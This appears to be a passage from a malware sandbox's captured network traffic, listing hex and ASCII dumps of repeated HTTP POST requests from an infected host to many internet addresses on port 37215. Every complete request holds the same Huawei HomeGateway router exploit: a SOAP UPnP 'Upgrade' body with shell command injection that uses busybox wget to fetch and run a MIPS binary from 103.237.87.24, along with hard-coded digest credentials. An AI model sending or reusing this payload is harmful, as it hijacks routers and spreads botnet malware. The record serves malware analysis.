2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1538192.168.2.1337744157.142.80.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501882076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1539192.168.2.133936241.244.106.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.501936913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1540192.168.2.135682041.173.238.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502011061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1541192.168.2.135466080.142.107.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502055883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1542192.168.2.133784241.186.1.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502306938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1543192.168.2.135863641.252.226.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502316952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1544192.168.2.1351822157.43.200.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502341986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1545192.168.2.135307841.13.73.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502350092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1546192.168.2.133763641.8.221.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502361059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1547192.168.2.1346552197.156.146.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502372026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1548192.168.2.1334832157.144.48.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.502391100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
